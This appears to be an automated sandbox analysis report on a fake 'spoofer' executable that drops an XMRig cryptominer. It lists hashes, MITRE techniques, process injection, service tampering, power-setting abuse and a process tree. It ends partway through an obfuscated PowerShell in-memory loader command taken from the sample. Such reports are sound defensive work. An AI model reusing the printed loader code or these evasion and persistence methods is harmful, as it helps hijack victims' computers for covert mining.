xmrig | 087f4e9181c90579b810e81873334937fdfe878a75807f879cbcd7bd603971d0

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-12-2024 15:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HaragonSpooferV1.exe
Size

31.3MB
MD5

2e4db068f97c8b3b5cede6fd73868ada
SHA1

a7bc72ecafef276a9504664a46b72732b06b2a69
SHA256

087f4e9181c90579b810e81873334937fdfe878a75807f879cbcd7bd603971d0
SHA512

5d6ea79abec83863d4ac13f182358cafa981cacf0217e527fae3e4f54e6a3cab5de8fa872475902e2be40c2d2350ab52b0179081621efb585774ee8dce2bf1ea
SSDEEP

786432:qUVPrCJU6sVskfZZyQ3xPLLbnRddQZ9C/IeTXGic7:qeF6sVskfjyKxPLHRcheT4

Score

10^/10

xmrig defense_evasion discovery evasion execution miner persistence pyinstaller upx

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1128 created 612	1128	powershell.EXE	5
PID 3772 created 612	3772	powershell.EXE	5

Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral1/memory/4324-1224-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/4324-1223-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/4324-1226-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/4324-1229-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/4324-1228-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral1/memory/4324-1227-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1128	powershell.EXE
3772	powershell.EXE
3184	powershell.exe
2036	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	HaragonSpooferV1.exe

Executes dropped EXE 4 IoCs

pid	Process
4084	har.exe
4936	Root + 2 Minute Start Delay.exe
3380	har.exe
3044	bsulumhydtcf.exe

Loads dropped DLL 29 IoCs

pid	Process
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe
3380	har.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
49	pastebin.com
50	pastebin.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
4136	powercfg.exe
4436	powercfg.exe
2968	powercfg.exe
764	powercfg.exe
1268	powercfg.exe
2140	powercfg.exe
3532	powercfg.exe
3740	powercfg.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	bsulumhydtcf.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\MRT.exe	Root + 2 Minute Start Delay.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4936 set thread context of 3476	4936	Root + 2 Minute Start Delay.exe	105
PID 3044 set thread context of 3664	3044	bsulumhydtcf.exe	129
PID 3044 set thread context of 4812	3044	bsulumhydtcf.exe	130
PID 3044 set thread context of 4324	3044	bsulumhydtcf.exe	136
PID 1128 set thread context of 4852	1128	powershell.EXE	140
PID 3772 set thread context of 3992	3772	powershell.EXE	142

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/4324-1222-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4324-1217-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4324-1218-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4324-1224-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4324-1223-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4324-1226-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4324-1229-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4324-1228-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4324-1227-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4324-1221-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral1/memory/4324-1220-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3560	sc.exe
736	sc.exe
3144	sc.exe
2056	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000c000000023c28-5.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HaragonSpooferV1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3440	powershell.exe
3440	powershell.exe
4936	Root + 2 Minute Start Delay.exe
3184	powershell.exe
3184	powershell.exe
4936	Root + 2 Minute Start Delay.exe
4936	Root + 2 Minute Start Delay.exe
4936	Root + 2 Minute Start Delay.exe
4936	Root + 2 Minute Start Delay.exe
4936	Root + 2 Minute Start Delay.exe
4936	Root + 2 Minute Start Delay.exe
4936	Root + 2 Minute Start Delay.exe
4936	Root + 2 Minute Start Delay.exe
4936	Root + 2 Minute Start Delay.exe
4936	Root + 2 Minute Start Delay.exe
3044	bsulumhydtcf.exe
2036	powershell.exe
2036	powershell.exe
1128	powershell.EXE
1128	powershell.EXE
3044	bsulumhydtcf.exe
3044	bsulumhydtcf.exe
3044	bsulumhydtcf.exe
3044	bsulumhydtcf.exe
3044	bsulumhydtcf.exe
3044	bsulumhydtcf.exe
3044	bsulumhydtcf.exe
3044	bsulumhydtcf.exe
1128	powershell.EXE
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
1128	powershell.EXE
4852	dllhost.exe
4852	dllhost.exe
1128	powershell.EXE
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
3772	powershell.EXE
4852	dllhost.exe
4852	dllhost.exe
3772	powershell.EXE
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
3772	powershell.EXE
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe
4852	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	3184	powershell.exe
Token: SeShutdownPrivilege	764	powercfg.exe
Token: SeCreatePagefilePrivilege	764	powercfg.exe
Token: SeShutdownPrivilege	2968	powercfg.exe
Token: SeCreatePagefilePrivilege	2968	powercfg.exe
Token: SeShutdownPrivilege	2140	powercfg.exe
Token: SeCreatePagefilePrivilege	2140	powercfg.exe
Token: SeShutdownPrivilege	1268	powercfg.exe
Token: SeCreatePagefilePrivilege	1268	powercfg.exe
Token: SeDebugPrivilege	2036	powershell.exe
Token: SeDebugPrivilege	1128	powershell.EXE
Token: SeShutdownPrivilege	3740	powercfg.exe
Token: SeCreatePagefilePrivilege	3740	powercfg.exe
Token: SeLockMemoryPrivilege	4324	dialer.exe
Token: SeShutdownPrivilege	3532	powercfg.exe
Token: SeCreatePagefilePrivilege	3532	powercfg.exe
Token: SeShutdownPrivilege	4436	powercfg.exe
Token: SeCreatePagefilePrivilege	4436	powercfg.exe
Token: SeShutdownPrivilege	4136	powercfg.exe
Token: SeCreatePagefilePrivilege	4136	powercfg.exe
Token: SeDebugPrivilege	1128	powershell.EXE
Token: SeDebugPrivilege	4852	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2000	svchost.exe
Token: SeIncreaseQuotaPrivilege	2000	svchost.exe
Token: SeSecurityPrivilege	2000	svchost.exe
Token: SeTakeOwnershipPrivilege	2000	svchost.exe
Token: SeLoadDriverPrivilege	2000	svchost.exe
Token: SeSystemtimePrivilege	2000	svchost.exe
Token: SeBackupPrivilege	2000	svchost.exe
Token: SeRestorePrivilege	2000	svchost.exe
Token: SeShutdownPrivilege	2000	svchost.exe
Token: SeSystemEnvironmentPrivilege	2000	svchost.exe
Token: SeUndockPrivilege	2000	svchost.exe
Token: SeManageVolumePrivilege	2000	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2000	svchost.exe
Token: SeIncreaseQuotaPrivilege	2000	svchost.exe
Token: SeSecurityPrivilege	2000	svchost.exe
Token: SeTakeOwnershipPrivilege	2000	svchost.exe
Token: SeLoadDriverPrivilege	2000	svchost.exe
Token: SeSystemtimePrivilege	2000	svchost.exe
Token: SeBackupPrivilege	2000	svchost.exe
Token: SeRestorePrivilege	2000	svchost.exe
Token: SeShutdownPrivilege	2000	svchost.exe
Token: SeSystemEnvironmentPrivilege	2000	svchost.exe
Token: SeUndockPrivilege	2000	svchost.exe
Token: SeManageVolumePrivilege	2000	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2000	svchost.exe
Token: SeIncreaseQuotaPrivilege	2000	svchost.exe
Token: SeSecurityPrivilege	2000	svchost.exe
Token: SeTakeOwnershipPrivilege	2000	svchost.exe
Token: SeLoadDriverPrivilege	2000	svchost.exe
Token: SeSystemtimePrivilege	2000	svchost.exe
Token: SeBackupPrivilege	2000	svchost.exe
Token: SeRestorePrivilege	2000	svchost.exe
Token: SeShutdownPrivilege	2000	svchost.exe
Token: SeSystemEnvironmentPrivilege	2000	svchost.exe
Token: SeUndockPrivilege	2000	svchost.exe
Token: SeManageVolumePrivilege	2000	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2000	svchost.exe
Token: SeIncreaseQuotaPrivilege	2000	svchost.exe
Token: SeSecurityPrivilege	2000	svchost.exe
Token: SeTakeOwnershipPrivilege	2000	svchost.exe
Token: SeLoadDriverPrivilege	2000	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1048	Conhost.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3656	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5020 wrote to memory of 3440	5020	HaragonSpooferV1.exe	83
PID 5020 wrote to memory of 3440	5020	HaragonSpooferV1.exe	83
PID 5020 wrote to memory of 3440	5020	HaragonSpooferV1.exe	83
PID 5020 wrote to memory of 4084	5020	HaragonSpooferV1.exe	85
PID 5020 wrote to memory of 4084	5020	HaragonSpooferV1.exe	85
PID 5020 wrote to memory of 4936	5020	HaragonSpooferV1.exe	86
PID 5020 wrote to memory of 4936	5020	HaragonSpooferV1.exe	86
PID 4084 wrote to memory of 3380	4084	har.exe	87
PID 4084 wrote to memory of 3380	4084	har.exe	87
PID 4936 wrote to memory of 3476	4936	Root + 2 Minute Start Delay.exe	105
PID 4936 wrote to memory of 3476	4936	Root + 2 Minute Start Delay.exe	105
PID 4936 wrote to memory of 3476	4936	Root + 2 Minute Start Delay.exe	105
PID 4936 wrote to memory of 3476	4936	Root + 2 Minute Start Delay.exe	105
PID 4936 wrote to memory of 3476	4936	Root + 2 Minute Start Delay.exe	105
PID 4936 wrote to memory of 3476	4936	Root + 2 Minute Start Delay.exe	105
PID 2736 wrote to memory of 1424	2736	cmd.exe	114
PID 2736 wrote to memory of 1424	2736	cmd.exe	114
PID 3044 wrote to memory of 3664	3044	bsulumhydtcf.exe	129
PID 3044 wrote to memory of 3664	3044	bsulumhydtcf.exe	129
PID 3044 wrote to memory of 3664	3044	bsulumhydtcf.exe	129
PID 3044 wrote to memory of 3664	3044	bsulumhydtcf.exe	129
PID 3044 wrote to memory of 3664	3044	bsulumhydtcf.exe	129
PID 3044 wrote to memory of 3664	3044	bsulumhydtcf.exe	129
PID 3044 wrote to memory of 4812	3044	bsulumhydtcf.exe	130
PID 3044 wrote to memory of 4812	3044	bsulumhydtcf.exe	130
PID 3044 wrote to memory of 4812	3044	bsulumhydtcf.exe	130
PID 3044 wrote to memory of 4812	3044	bsulumhydtcf.exe	130
PID 3044 wrote to memory of 4812	3044	bsulumhydtcf.exe	130
PID 3044 wrote to memory of 4812	3044	bsulumhydtcf.exe	130
PID 3044 wrote to memory of 4812	3044	bsulumhydtcf.exe	130
PID 3044 wrote to memory of 4812	3044	bsulumhydtcf.exe	130
PID 3044 wrote to memory of 4812	3044	bsulumhydtcf.exe	130
PID 3044 wrote to memory of 4324	3044	bsulumhydtcf.exe	136
PID 3044 wrote to memory of 4324	3044	bsulumhydtcf.exe	136
PID 3044 wrote to memory of 4324	3044	bsulumhydtcf.exe	136
PID 3044 wrote to memory of 4324	3044	bsulumhydtcf.exe	136
PID 3044 wrote to memory of 4324	3044	bsulumhydtcf.exe	136
PID 2964 wrote to memory of 4384	2964	cmd.exe	138
PID 2964 wrote to memory of 4384	2964	cmd.exe	138
PID 1128 wrote to memory of 4852	1128	powershell.EXE	140
PID 1128 wrote to memory of 4852	1128	powershell.EXE	140
PID 1128 wrote to memory of 4852	1128	powershell.EXE	140
PID 1128 wrote to memory of 4852	1128	powershell.EXE	140
PID 1128 wrote to memory of 4852	1128	powershell.EXE	140
PID 1128 wrote to memory of 4852	1128	powershell.EXE	140
PID 1128 wrote to memory of 4852	1128	powershell.EXE	140
PID 1128 wrote to memory of 4852	1128	powershell.EXE	140
PID 4852 wrote to memory of 612	4852	dllhost.exe	5
PID 4852 wrote to memory of 676	4852	dllhost.exe	7
PID 4852 wrote to memory of 948	4852	dllhost.exe	12
PID 4852 wrote to memory of 60	4852	dllhost.exe	13
PID 4852 wrote to memory of 512	4852	dllhost.exe	14
PID 4852 wrote to memory of 608	4852	dllhost.exe	15
PID 4852 wrote to memory of 1100	4852	dllhost.exe	17
PID 4852 wrote to memory of 1116	4852	dllhost.exe	18
PID 4852 wrote to memory of 1136	4852	dllhost.exe	19
PID 4852 wrote to memory of 1160	4852	dllhost.exe	20
PID 4852 wrote to memory of 1236	4852	dllhost.exe	21
PID 4852 wrote to memory of 1292	4852	dllhost.exe	22
PID 4852 wrote to memory of 1324	4852	dllhost.exe	23
PID 4852 wrote to memory of 1436	4852	dllhost.exe	24
PID 4852 wrote to memory of 1452	4852	dllhost.exe	25
PID 4852 wrote to memory of 1560	4852	dllhost.exe	26
PID 4852 wrote to memory of 1568	4852	dllhost.exe	27

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:60
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4528f0ed-5873-4282-9708-e2731a8f146e}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4852
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{97fb194a-fae9-41e9-b0a7-a29314223c3a}
  2⤵
  PID:3992

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:512

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:608

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1116
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:dwEajVQQVYTh{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$VYGiaoDTOMCdpZ,[Parameter(Position=1)][Type]$kbiEMKFIDh)$pCdDkEdxHVk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'ega'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+'l'+'e',$False).DefineType(''+[Char](77)+'yDe'+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'Ty'+'p'+''+[Char](101)+'',''+'C'+'l'+'a'+''+[Char](115)+'s,P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+',S'+'e'+''+'a'+''+'l'+'e'+[Char](100)+','+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+''+[Char](108)+''+[Char](97)+'s'+'s'+','+[Char](65)+''+[Char](117)+'t'+'o'+''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$pCdDkEdxHVk.DefineConstructor(''+'R'+''+'T'+'S'+'p'+''+'e'+''+[Char](99)+'i'+[Char](97)+''+'l'+'Na'+[Char](109)+''+'e'+',H'+[Char](105)+''+'d'+''+'e'+''+'B'+''+[Char](121)+''+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$VYGiaoDTOMCdpZ).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+'m'+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+''+'d'+'');$pCdDkEdxHVk.DefineMethod(''+'I'+''+[Char](110)+'vo'+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+''+'H'+'i'+[Char](100)+''+'e'+''+[Char](66)+'ySi'+[Char](103)+','+[Char](78)+'ew'+[Char](83)+'lo'+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+'tu'+[Char](97)+''+[Char](108)+'',$kbiEMKFIDh,$VYGiaoDTOMCdpZ).SetImplementationFlags('R'+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $pCdDkEdxHVk.CreateType();}$coRSyRjcxpUVx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 